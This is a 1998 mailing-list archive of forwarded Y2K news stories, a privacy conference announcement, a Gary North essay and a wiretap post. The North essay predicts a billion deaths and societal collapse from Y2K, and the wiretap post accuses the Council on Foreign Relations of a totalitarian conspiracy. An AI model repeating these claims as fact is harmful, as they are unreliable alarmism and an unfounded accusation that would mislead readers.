Test conductors sent e-mail messages to city officials notifying them=20
of mock natural disasters or failed systems. Emergency officials,=20
including police, fire and utility workers, then had to react. A=20
system was set up to judge response times.

At emergency management headquarters, officials frantically practiced=20
deploying police officers to deal with problems and posted red flags=20
on a giant city map to highlight emergency areas.

The illusion was made complete with reporters summoned for ``news=20
conferences'' and mock reports from a National Weather Service=20
official.

As the drill began, officials were told the city's 911 emergency=20
system had failed. Officials quickly switched over to a county system=20
and broadcast two new police and fire department emergency numbers on=20
television.

Cass said city workers improvised well when unexpected problems arose.


``We pulled together and acted like a team,'' he said. ``A lot of=20
these agencies aren't used to dealing with each other like they had=20
to tonight.''

Mayor Windy Sitton said the test revealed that Lubbock needs to study=20
how to better respond to natural gas shortages. When fake gas outages=20
left hundreds of homes without heat, officials had to devise a plan=20
to set up shelters in the parts of town that still had power.
------------------------------------------------------------------

The Kansas City Star=20
Y2k

Nervous world seeks ways to exterminate the year 2000 bug

By DAVID HAYES and FINN BULLERS - Staff Writers
Date: 09/26/98 22:15

Marilyn Allison has spent the last three years making sure computers=20
at Blue Cross and Blue Shield of Kansas City don't fail after the=20
ball drops on New Year's Eve 1999.=20

Allison is confident Blue Cross has the problem well in hand. And she=20
thinks most of Kansas City does, too.=20

But she still is planning to sock away enough food, water, cash and=20
firewood to last a couple of weeks in case everything does go haywire=20
on Jan. 1, 2000.=20

There's the rub of the year 2000 bug, a glitch that could cause some=20
computers, machinery, medical equipment, utilities and VCRs to quit=20
working, or spit out bad information, when the 1900s become the 2000s.
 Nobody really knows what's going to happen.=20

The problem stems from computer systems and billions of embedded=20
computer chips that might read the "00" in a computer program as 1900=20
rather than 2000.=20

Edward Yardeni, one of the nation's leading economists, forecasts a=20
70 percent chance of global recession because of the bug. Another=20
leading forecaster, David Wyss, chief economist for Standard & Poor's,
 doesn't expect significant disruption. He even contends the=20
resulting fallout might be fun -- if we keep a sense of humor about=20
it.=20

But everyone acknowledges something is coming down the tracks, said=20
Leon Kappelman, a university professor and author who is spending=20
much of his time these days talking about the year 2000 problem.=20

"The uncertainty is whether it's a locomotive or a bicycle,"=20
Kappelman said. "And it's difficult to get definitive evidence."=20

Until now there hasn't been much information to rely on. Some credit=20
cards with "00" expiration dates have been rejected. A 104-year-old=20
Minnesota woman was invited to report to kindergarten, and a computer=20
docked an Olathe couple $17,800 for insurance premiums.=20

But those are just scattered hints of the trouble to come. The real=20
warning lies in our growing reliance on vast networks of technology --
 a single misfire in the wrong place can sabotage lives in far-flung=20
places.=20

For example, when just one satellite malfunctioned in May, millions=20
of pagers and automated teller machines went out for two days. An ice=20
storm in eastern Canada knocked out part of the country's power grid=20
and shut off power to millions of people for more than a week.=20

Think if all of that -- and more -- happened on one day: Jan. 1, 2000,
 a Saturday.=20

American businesses rely on computers to do almost everything. They=20
run huge manufacturing machines, answer telephones, pay employees and=20
control alarm systems.=20

Federal government computers track airliners, generate Social=20
Security checks, and control satellites in space and missiles on the=20
ground. Cities use computers to run traffic lights and dispatch=20
police officers.=20

Utilities use them to operate water and sewage systems. Grocery=20
stores use them to keep track of stock and place orders.=20

Even more important than the software that runs those computers are=20
the tiny, embedded computer chips buried in the guts of technological=20
gadgets, heavy machinery, airliners and even granddad's pacemaker.=20

There are 40 billion of the chips, most of them hard or impossible to=20
test, said Dave Hall, an expert with the CABA Corp. in Oak Brook, Ill.
=20

Estimates vary on how many of those chips will fail. Hall says 1=20
percent. Others say failures could go as high as 10 percent -- and=20
even higher in some medical equipment.=20

Even a 1 percent failure rate means 400 million chips would fail.=20

Kappelman, the University of North Texas professor, thinks the=20
interrelationships between all those elements will cause serious=20
disruptions.=20

For instance, it's unlikely that America's electric utilities will be=20
caught unprepared on the last New Year's Eve of the 1900s. In fact,=20
an industry report released last week said utility problems seemed to=20
be fewer -- and easier to fix -- than expected.=20

But if only a few plants shut down on Jan. 1, 2000, the strain on the=20
rest of the power grid could trip a cascading failure that causes=20
widespread brownouts or blackouts.=20

"This will change the way we see the world," Kappelman said. "We'll=20
see our dependence on technology in a whole new way."=20

The fix is in?=20

Even if embedded chips are hard to check, the software problem=20
shouldn't seem too difficult to fix -- on the surface, at least.=20

For decades, computers have been programmed to recognize dates using=20
six digits: today's date is 09/27/98. When the calendar rolls over at=20
midnight on New Year's Eve 1999, computers that haven't been taught=20
differently will see the year as 1900 or some other date entirely. If=20
they work at all.=20

So solve the problem. Add a couple of numbers to the programming code.
 No big deal, right?=20

It's become a very big deal. For Sprint Corp., that small fix means=20
programmers must pore over 80 million lines of code. The fix will=20
take two years.=20

Big business thinks the problem is so significant that fixing it has=20
become a big business.=20

Sprint Corp. is spending $200 million on year 2000 repairs; Hallmark=20
Cards, $25 million; Blue Cross in Kansas City, $25 million; UMB Bank,=20
$22 million; Yellow Corp., $17 million. Johnson County taxpayers will=20
pay $17.2 million to fix that county's year 2000 problems.=20

All told, the fix in the Kansas City area will easily top the $400=20
million mark. Worldwide, the total is estimated at $300 billion to=20
$600 billion.

Entire companies have sprouted just to deal with the year 2000 bug.=20
More than 140 public companies, ranging from Acceler8 Technology to=20
Zmax Corp., are touting their solutions.=20

Where there's a problem, there's a lawyer. Law firms have established=20
special teams just to handle potential litigation from the year 2000=20
problem.=20

Companies that cater to survivalists are hawking canned or dried food=20
and survival gear to those with year 2000 angst.=20

That type of hype is spreading across the Internet on hundreds of=20
year 2000 Web sites. A few of the most radical year 2000 worriers=20
already have moved to rural areas to get away from what they think=20
will be urban chaos when the lights go out and the food supply chain=20
breaks down.=20

Cynthia Ratcliffe of Pleasant Valley, a disabled former office worker,
 can't afford to move. But she's worried.=20

"I'm figuring at least six months of everything being messed up,"=20
said Ratcliffe, who's stocking up on canned food and kerosene lamps.=20
She's worried that those who have prepared will become targets for=20
those who haven't.=20

"I'm contemplating whether I should get some 2-by-4s to put bars over=20
the doors and windows," Ratcliffe said. "I'm trying to decide whether=20
I should buy a weapon."=20

One expert sees self-interest driving much of the panic.=20

Consultants benefit from the year 2000 fear that helps pay their=20
skyrocketing fees, said Nicholas Zvegintzov, president of Software=20
Management Network of New York and a programmer for 35 years.=20
Politicians also benefit from a puffed-up problem they can fix=20
without much effort.=20

"Unfortunately, there's no political clout in common sense,"=20
Zvegintzov said.=20

Sen. Bob Bennett, a Utah Republican who coordinates the Senate's year=20
2000 efforts, isn't doing anything to add to the national calm.=20

In a July 15 speech to the National Press Club in Washington, Bennett=20
told journalists to expect electrical brownouts and regional=20
blackouts. He predicts some banks will go bankrupt and some water=20
systems will break down.=20

Such alarm might actually be good, said Heidi Hooper, year 2000=20
director for the Information Technology Association of America. She=20
said the general public could use a serious wake-up call.=20

"These huge Fortune 100 companies are spending, collectively,=20
billions and billions of dollars. I don't think that's hype," she=20
said. "They are not going to spend that money for no reason. They=20
know, bottom line, that if they are going to make money they have to=20
stay in business."=20

But for some businesses to stay afloat, other businesses will have to=20
drown, she said.=20

"What we need, unfortunately, is examples of failures," Hooper said.=20
"That's going to start soon enough in 1999. And the private sector is=20
not going to share that information, so it's going to have to be up=20
to the federal government to step in."=20

But the federal government is in no shape to provide leadership.=20

Overall, one congressman gave the federal government a "D" on its=20
most recent year 2000 preparedness report card, up from the "F" it=20
received in June.=20

"This is not a grade you take home to your parents," said Rep. Steve=20
Horn, a California Republican and chairman of the House subcommittee=20
on government management of information and technology.=20

Horn predicts the government will not be able to fix a substantial=20
number of "mission critical" systems by 2000. And the price tag to=20
fix the 24 governmental departments surveyed is $6.3 billion, up $1=20
billion from the estimate given by the Office of Management and=20
Budget.=20

"The executive branch has a deadline that cannot be extended," Horn=20
said. "There is no margin for error."=20

Closer to home, Kansas City is requiring all city departments to=20
submit contingency plans by October for dealing with the year 2000=20
problem.=20

What to look for: Will traffic lights work? Will prisoners be=20
released early if a computer mistakenly thinks an inmate has been=20
jailed for more than 100 years? Will fire trucks start, and what is=20
the backup plan if they don't?=20

"You don't want to overreact, and we're not," said John Franklin,=20
assistant city manager. "But there is a real issue here for public=20
managers that's kind of scary."=20

Elsewhere, Water District No. 1 of Johnson County will spend $1.56=20
million to fix 4,109 computer programs and 701,021 lines of code by=20
the end of next summer. The district says the job is 75 percent=20
complete, and General Manager Byron Johnson said he was confident the=20
district would be prepared.=20

But experts aren't prepared to declare victory.=20

"My whole theme from day one is we need answers," said Yardeni, the=20
Yale economist and managing director of Deutsche Bank Securities.=20
"I'm not trying to foment panic. I'm not trying to create revolution.=20
But you have to be a naive optimist to think things are going to be=20
pretty relaxed Jan. 1, 2000."=20






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 6 Oct 1998 13:40:20 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.15:Privacy Conference Announcement
Message-ID: <199810070334.UAA27043@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.15:Privacy Conference Announcement
Date: Mon, 5 Oct 1998 00:53:20 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.15:Privacy Conference Announcement
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Monday October 5, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: ACLU of Wisconsin (Press Release)
acluwicmd@aol.com

Privacy Conference Announcement

ACLU of Wisconsin Data Privacy Project announces a privacy
conference on November 13, 1998 in Milwaukee, Wisconsin. The
conference is co-sponsored by University of Wisconsin-Milwaukee
Institute of World Affairs.  The event features keynote addresses by
Spiros Simitis, principal author of the "EU Directive on Data Protection"
and Stefan Walz, privacy commissioner for the German state of Bremen.

Registration information may be obtained from Carole Doeppers,
Director, Wisconsin Data Privacy Project, 122 State Street, Suite 407,
Madison, WI  53703. Or contact her by phone (608-250-1769),
fax (608-258-9854) or e-mail <acluwicmd@aol.com>.


"Data Privacy in the Global Age",
Friday, November 13, 1998,
Italian Conference Center, Milwaukee

Registration Fee: $175
Limited number of scholarships available upon request

Conference lodging:
Astor Hotel 1-800-242-0355 (in state)
1-800-558-0200 (outside Wisconsin)




Conference Program:  November 13


Welcome and Introductions

Keynote Address:

"The EU Directive: Its Impact on Electronic Commerce with Third Countries"
Dr. Spiros Simitis, principal author of the "EU Directive on Data
Protection


Concurrent Sessions:

"The Internet: New Frontiers for Privacy and the Law"

Moderator:
                    Andrea Schneider,
                    Professor, Marquette University School of Law

Panelists:
                    Fred Cate, Author and Professor,
                    Indiana University School of Law

                    Timothy Muth, Attorney and Chair,
                    Milwaukee Bar Association's Technology Committee


"A New Electronic Bill of Rights:  Good or Bad for Business?"

Moderator:
                    David Luce, Professor Emeritus,
                    UW-Milwaukee Philosophy Department

Panelists:
                    Evan Hendricks, Editor/Publisher, Privacy Times

                    Paola Benassi, Operations Manager, TRUSTe


Luncheon


Afternoon Keynote Address:

"The German Approach to Data Protection"
Dr. Stefan Walz, Privacy Commissioner, German State of Bremen


Concurrent Workshops:

"Trade-off of Values: Freedom of Information vs. Information Privacy"

Moderator:

                    Len Levine, Professor,
                    UW-Milwaukee Computer Science Department

Panelists:

                    Marty Kaiser, Editor, Milwaukee Journal-Sentinel

                    James Friedman, Legal Counsel, Wisconsin FOI Council

                    Don Gemberling, Director, Information & Policy
Division.
                    Minnesota Department of Administration

                    Charles Sykes, Author and Radio Talk-Show Host



"Developing Your Own Fair Information Practices:  Balancing Commercial and
Consumer Rights"

Moderator:

                    David Flaherty, Commissioner,
                    Office of Information and Privacy, British Columbia

Discussants:

                    Patrick Sullivan, Partner, PricewaterhouseCoopers LLP

                    James O'Brien, Vice President, Sun Tzu Security Ltd.


Reception

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.











**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 6 Oct 1998 13:39:04 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Worth Reading: Fwd from Gary North: Y2K
Message-ID: <199810070334.UAA27059@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Worth Reading: Fwd from Gary North: Y2K
Date: Mon, 05 Oct 1998 09:46:30 -0500
To: believer@telepath.com

Forwarded from Gary North:
-------------------

     By now you know my concern over the Year 2000 Problem: the
collapse of the division of labor.  As Leonard Read wrote in "I,
Pencil," no one knows how to make a pencil.  It's too
complicated: cut wood, carbon, paint, rubber, metal.  A pencil
can exist only because the division of labor exists.  But if a
pencil is too difficult to make, what about replacement parts for
a dam? What about an automobile?

     But could this really happen?  Wrong question: How will this
not happen?  There is not one compliant bank on earth, not one
compliant public utility, not one compliant industry.  Yet we
have only 15 months to go.  And in between now and then,
worldwide panic will hit, making code-correction very difficult.
Also, the latest estimate of embedded chips is 70 billion.  The
latest estimated failure rate for embedded systems is 10% to 20%.

     All of our management systems rely on mainframe computers.
The people who ran the pre-computer management systems in 1965
have been fired or have retired.  The knowledge they had went
with them.  They were replaced by digital idiot savants.  These
idiot savants are not flexible.  Dustin Hoffman's character in
Rainman was a model of flexibility compared to a computer.
Computers do exactly what they were programmed to do.  They do
not listen to reason.  They do not hear your screams.  Their
attitude is best expressed by Rhett Butler as he walked away from
Scarlett for the last time.

     Look ahead.  It's Friday, January 14, 2000.  You are
standing in front of a bank teller.  You have stood in line for
three hours.  There is a line of 200 people behind you.  You have
your bank statement from last month.  It says you have $4,517.22
in your checking account.  But your checks have all bounced:
"Account closed."  Every account is automatically closed after
two years of no activity, and your account had no activity from
1/1/1900 (00) to 1/1/1902 (02).  Now you want your bounced checks
cleared.  The teller says, "I'm sorry.  Our computer shows the
account is closed."  "Well, then, re-open it."  "Are you making a
deposit?"  "No."  "Then I can't re-open it."  Problem: you now
have no money.  The account is closed.  Your printed records are
for last month.  Maybe you spent all that money on Christmas.
She has no idea.  "I am not authorized to give you cash."  (Well,
maybe $200, by government decree.)  What are you going to do?  It
will take many months to fix this for every depositor on earth.
The banks will not survive for weeks.

     She has no authority to veto the computer.  Nobody does.
There is no alternative management system in place that will
enable a bank's employees to fix the accounts and clear all
checks and credit card transactions.  All banks must stop
accepting checks and credit card accounts until there is a way to
clear the accounts.  There is no way.  Their management systems
must be redesigned to go back to 1965, all over the world: a
paper and ink system.  But there is no time to do this.  This
would take years even if all the banks stayed up.  But they will
all go down.  Any bank that is forced out of the capital markets
for a week will go bankrupt -- two weeks, for sure.  But if they
are all out of the capital markets, there will be no capital
markets.  That means Western civilization will shut down:
"Account closed."

     "Our computer is down."  These four words may kill you.
Literally.  If you do not have financial reserves that are not
electronic, these four words will strip you of your ability to
buy and sell.  And not just you: everyone.  The division of labor
will collapse.

     How will society produce a pencil?  Or repair parts for a
power generation plant?

     Think ahead.  Sit down with a pen and paper.  (It's good
practice for the future.)  Think of every situation in which your
life would be disrupted by the words, "Our computer is down."  If
you could not get your immediate problem solved because of these
for words, for just 60 consecutive days, what would happen to
you?  Think this through.

     Which local systems are threatened?  Here is a preliminary
list: banks, paychecks, supermarkets, drug stores (all
prescriptions on computer), the water/sewer company, the electric
utility, telephone service.  If you lack imagination here, rent
The Trigger Effect.

     Now let's move outward toward local emergency institutions.
Think of the another missing 9 and two more 1's: 9-1-1.  The
police, the fire department, hospitals, ambulances.  The phones
may or may not be down, but 911 switchboards are only rarely
compliant today.

     Now let's move farther outward into the world of capital:
money market fund, mutual fund, pension fund, bond fund,
insurance, second mortgages, Social Security, Medicare, Medicaid,
IRS refunds.  You just lost your retirement money.  If your home
burns down, you'll not get a replacement unless you have gold
coins or cash to buy a used one.  If you die, your wife will get
nothing that isn't close at hand, i.e., in hand.

     "Our computer is down."  This phrase will serve nicely as an
epitaph for our civilization.  Only if the computers don't go
down, and also don't make bad calculations, can the West avoid
this epitaph.  But if they are not fixed, they will go down or go
nuts.


         A BILLION LIVES LOST, IF THINGS GO FAIRLY WELL

     I have been writing for over a year on this with all the
skill I have.  I simply cannot get it across to all of you, or
even to most of you.  I am never at a loss for words, but I am at
a loss for persuasion.  I have been unable to persuade the vast
majority of my readers, after almost two years, that if the
division of labor collapses, we will lose millions of lives.  Joe
Boivin, who was the y2k director for Canada's Imperial Bank and
Commerce until he quit, estimates that a billion people will die
in 2000.  He limits his discussion to the third world.  I think
we could lose half a billion in the urban West.

     Unthinkable?  All right, show me how any large city will
survive if the power goes off for 60 days, all railroad
deliveries of grain and coal stop, all gasoline station pumps
shut down, and there are no banks.  Go on.  I'm serious.  Sit
down and outline a scenario that will keep an urban population
alive without mainframe computers.

     The army?  There are 120 U.S. cities that the government has
targeted as vulnerable to cyberwarfare.  There are 1.4 million
people in the entire U.S. military.  Few have any training for
riot control and food delivery.  The government cannot provide
such training without creating a panic.  The military is
dependent on the civilian communications system.  How will 1.4
million untrained military personnel -- including the Navy --
police a destitute population of 60 million urban residents, not
counting the suburbs?  That's 11,666 people per city.  But the
large cities will get the lion's share.  What about where you
live?  The bands of arsonists and rioters are loose in your city.
What will your police do?  I'll tell you: they will stay home if
they are not being paid.  And if the banks are down, they will
not be paid.

     I know what you're thinking.  "They just can't let this
happen."  What can "they" do to stop it?  The United States is
short 500,000 to 700,000 mainframe programmers.

     Roberto Vacca wrote The Coming Dark Age in 1973.  He did not
forecast y2k.  If he had, the book would have been far more
persuasive.  His point was that our technology has extended
beyond what we can understand.  I was not impressed because that
is true of the free market at all times.  This is the genius of
the free market.  No one understands all of the interconnections,
yet we prosper.  So, I dismissed the book's thesis.  What I did
not see, and he did not see, was y2k.  We have transferred to
digital idiot savants all authority to make decisions that men
found either too boring or too complex to make.  We removed this
decision-making authority from people and delegated it to
machines.


              FROM ANALOGICAL TO DIGITAL AND BACK

     It's time to talk theology.  Cornelius Van Til argued that
men must think God's thoughts after Him -- analogically.  God is
a person.  He's also three persons.  We are persons.  Our
universe reflects God's personality.  We don't live in an
impersonal world.  The biblical doctrine of the creation forces
us to accept the doctrine of cosmic personalism.

     Modern computers do not think.  They count.  But modern man
since the Renaissance has believed that number, not God's written
revelation, is the touchstone of truth.  He has believed that
mankind's inability to comprehend (surround mentally) the
infinitely complex universe can be compensated for.  Man can use
numerical formulas to substitute for omniscience.  He can take a
shortcut to omniscience.  He can develop numerical formulas that
allow him to control the external world, which is controlled by
number.  Why a capacity of the mind -- numerical coherence --
should also control the external realm is a great mystery.  In
fact, as Nobel Prize physicist Eugene Wigner said in a 1960
essay, the effectiveness of number in science is unreasonable.
But it does work within creation's limits.

     Men have sought numerical shortcuts to cosmic knowledge and
cosmic power.  They have found many shortcuts, and on these
shortcuts modern science rests.  But then, in the 1950's,
programmers took another shortcut -- a digital shortcut.  They
saved two holes out of 80 in IBM punch cards.  This seemingly
minor shortcut has brought society to the brink of destruction.
We are not lemmings rushing to destruction.  We are sheep being
driven toward a cliff by idiot savants, to whom we have delegated
control over our affairs.

     Man worships science and its shortcuts.  He worships the
creations made by his own hands and  mind.  We will soon find
that such idolatry is always deadly.  Modern man thinks he has
shoved God out of the universe.  He has used Darwinism and a
theory of vast cosmic impersonal time to remove Him from man's
newly acquired domain.  Natural selection has replaced God's
purpose.  Cosmic time has replaced the six-day creation.  But now
we face the institutional monstrosity of the digital
impersonalism of the idiot savants.  Computers can count.  Can
they ever count!  But the dates they use after '99 will be wrong.



                       WHAT WILL YOU DO?

     You should now have a list of services and goods that will
no longer be provided if the computers go down.  It's a long
list.  You need a second list.  What items must you buy now that
can substitute for these lost services?  You can't afford to buy
them all.  There will be a panic to buy such goods next year.  It
has already begun (e.g., Chinese diesel generators).  Where will
you get the fuel for a generator?  Electricity for a well pump?
Propane for a cook stove?  Heat in the winter?  Think of Montreal
last January.

     But will the computers go down?  Senator Robert Bennett said
it well on July 14 at a National Press Club speech.  If 2000 were
the next day, this civilization might collapse.   But, he said,
we can save it between July 15 and Jan. 1, 2000.  To which I
reply: How?  What is being done, worldwide, to avoid the death of
the computers?  Not just in the U.S. -- worldwide?  Almost
nothing.  There are not enough skilled programmers.

     I suppose you get tired of reading about this.  I am surely
tired of writing it.  But until I can no longer mail this
newsletter, or until all the computers are fixed in late 1999, I
will continue to nag you . . . not to death -- to life.  As it
stands today, if tomorrow were 2000, we would see the end of
this civilization in 60 days.  If you think I'm wrong, jot down
those life-support systems that are 2000- compliant today.  It's
an empty list.  How will we get from empty to fixed, worldwide,
in the next 15 months?  This is not a trick question.  It's a
life-and-death question.  Do you have an answer and a contingency
plan?  Don't wait for leadership on this matter.  Leaders are in
y2k denial.  You must lead.  If you won't, who will?  You are
responsible for you.  What will you do?  How soon?


Sincerely,

Gary North




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 6 Oct 1998 13:39:41 +0800
To: cypherpunks@cyberpass.net
Subject: IP: "Big Brother" Watches "Big Brother"
Message-ID: <199810070334.UAA27073@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: roundtable <roundtable@geocities.com>
Subject: IP: "Big Brother" Watches "Big Brother"
Date: Mon, 5 Oct 1998 16:30:20 -0400
To: ignition-point@majordomo.pobox.com

On Tuesday April 28, 1998 COUNCIL ON FOREIGN RELATIONS MEMBER Senate
=46inance Committee Chairman William Roth, sited several incidents describin=
g
mistreatment by the criminal  investigation division of the IRS.

The same day The Treasury Department announced  that former CIA and FBI
chief  COUNCIL ON FOREIGN RELATIONS MEMBER William Webster would head up a
special investigation of the IRS's criminal investigation division.

Sunday May 4, 1998 on the CBS show Face the Nation,  COUNCIL ON FOREIGN
RELATIONS MEMBER Senator Daniel Patrick Moynihan said "The IRS is not out
of control, it's just not under control,"  "There is no management system."
"The criminal division (of the IRS) got out of control. That SWAT team
breaking into businesses with body armor and automatic weapons - now what's
that?" asked Moynihan. "That is no way to behave with taxpayers. We can get
this under control and will."

COUNCIL ON FOREIGN RELATIONS MEMBER Moynihan expressed confidence in
Congress and the agency's new director, COUNCIL ON FOREIGN RELATIONS MEMBER
Charles O. Rossotti, to create such a system and give it a face that is
friendlier to the public than the aggressive, arm-twisting "Big Brother"
described by taxpayers at Senate Finance Committee hearings held the  week
of April 28th, and in September 1997.

COUNCIL ON FOREIGN RELATIONS MEMBER Charles O. Rossotti may be able to give
the system  a friendly face  The problem is the friendly face will do
little more than hide the same "Big Brother" tactics. Wiretaps may be one
of those tactics.

Some insight into how COUNCIL ON FOREIGN RELATIONS MEMBER William Webster
thinks, is found in the USA Today article that follows.  The article is
about a record number of "Big Brother" wiretaps in the US. The excuse for
the wiretaps "is a stepped-up federal response to increased terrorist
activity on American soil. Opponents argue that the process endangers the
very liberties it seeks to protect."

COUNCIL ON FOREIGN RELATIONS MEMBER William Webster, head of the
investigative team looking into "Big Brother" IRS abuses, is a proponent of
increased "Big Brother" wiretaps who believes,

 	"This issue is where the rubber hits the road," said  [COUNCIL ON
=46OREIGN RELATIONS MEMBER] William Webster, who headed the FBI in 1978 when
the law allowing the secret wiretaps was passed. "It's where we try to
balance the concept of our liberty against what has to be done to protect
it."

The USA Today article follows:

>Hunt for terrorists brings about record rise in U.S. wiretaps
>By Richard Willing / USA TODAY [ October 5, 1998]
>>[ http://detnews.com:80/1998/nation/9810/04/10040083.htm ]
>
>WASHINGTON -- Federal judges operating in secret courts are authorizing
>unprecedented numbers of wiretaps and clandestine searches aimed at spies
>and terrorists in the United States, Justice Department records show.
>
> During the past three years, an average of 760 wiretaps and searches a
>year were carried out, a 38-percent increase from the 550 a year from
>1990-94.
>
> Federal judges have authorized a yearly average of 463 ordinary wiretaps
>since 1990 in drug, organized crime and other criminal cases.
>
> Part of the growth in surveillance is attributed to an increase in
>espionage and terrorist activities in the country.
>
> "There's a greater quantity of the folks who are potentially problematic
>out there," said Jamie Gorelick, who as deputy attorney general from
>1994-97 helped review wiretap applications.
>
> Proponents say the surveillance reflects a stepped-up federal response to
>increased terrorist activity on American soil.
>
> Opponents argue that the process endangers the very liberties it seeks to
>protect.
>
> "This issue is where the rubber hits the road," said  [COUNCIL ON FOREIGN
>RELATIONS MEMBER] William Webster, who headed the FBI in 1978 when the law
>allowing the secret wiretaps was passed. "It's where we try to balance the
>concept of our liberty against what has to be done to protect it."
>
> The wiretaps, which are applied for by the Justice Department under the
>Foreign Intelligence Surveillance Act and carried out by the FBI and
>National Security Agency, have received their greatest use yet under
>President Clinton and Atty. Gen. Janet Reno.
>
> Since 1995, Foreign Intelligence Surveillance Act courts also have
>authorized searches of the homes, cars, computers and other property of
>suspected spies. In its two decades, those courts have approved 11,950
>applications and turned down one request.
>
> Generally, defense lawyers can challenge the basis for authorizing a
>wiretap. But supporting information for wiretaps authorized by those
>courts is sealed for national security reasons.
>
> "It legitimizes what would appear to be contrary to constitutional
>protections," said Steven Aftergood, privacy specialist at the Federation
>of American Scientists. "It's a challenge to the foundation of American
>liberties."
>
>Opponents also say the government is using the wiretaps to replace
>conventional criminal searches, which must meet a higher legal standard.
>
> "There's a growing addiction to the use of the secret court as an
>alternative to more conventional investigative means," said Jonathan
>Turley, law professor at George Washington University in Washington, D.C.
>
> The wiretaps are meant to develop intelligence, not to help make criminal
>cases. But the wiretap information was used to secure guilty pleas from
>CIA turncoats Aldrich Ames in 1994 and Harold Nicolson in 1997.
>
> How the surveillance act works
>
>    * The Foreign Intelligence Surveillance Act of 1978 created a special
>secret court for authorizing wiretaps on suspected spies.
>     * The court was intended by Congress as a check against the power of
>presidents, who until 1978 had authorized wiretaps and warrantless
>searches in the name of national security.
>     * The law requires the Justice Department, and usually the FBI or the
>National Security Agency, to show a judge that the target is a foreign
>government or agent engaging in "clandestine intelligence gathering
>activities" or terrorism.

roundtable
___

Visit the Roundtable Web Page: http://www.geocities.com/CapitolHill/2807

Title-50 War and National Defense =A7 783 states - "It shall be unlawful for
any person knowingly to combine, conspire, or agree with any other person
to perform any act which would substantially contribute to the
establishment within the United States of a totalitarian dictatorship, the
direction and control of which is to be vested in, or exercised by or under
the domination of control of, any foreign government."

The Council on Foreign Relations are in violation of Title-50 War and
National Defense =A7 783. The Council on Foreign Relations has unlawfully an=
d
knowingly combined, conspired, and agreed to substantially contribute to
the establishment of one world order under the totalitarian dictatorship,
the direction and the control of members of Council on Foreign Relations,
the Royal Institute of International Affairs, and members of their branch
organizations in various nations throughout the world. That is
totalitarianism on a global scale.

____
Visit the Roundtable Web Page: http://www.geocities.com/CapitolHill/2807
E-mail: roundtable@mail.geocities.com
read on-line: Psychological Operations In Guerrilla Warfare ( The CIA's
Nicaragua Manual); The Secret Team by Fletcher Prouty;  The NAFTA PSYOP;
Nitze's Not-Sees;   & More
visit: U.S. Army War College - Meet Henry L. Stimson and Elihu Root
Professors of Military Studies







**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 6 Oct 1998 13:39:44 +0800
To: cypherpunks@cyberpass.net
Subject: IP: "The Internet 1998: The end of the beginning"
Message-ID: <199810070334.UAA27086@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: "The Internet 1998: The end of the beginning"
Date: Tue, 06 Oct 1998 05:57:25 -0500
To: believer@telepath.com

Source:  Business Today
http://www.businesstoday.com/techpages/wsj2100598.htm

BT EXCLUSIVE: The Internet 1998: The end of the beginning 

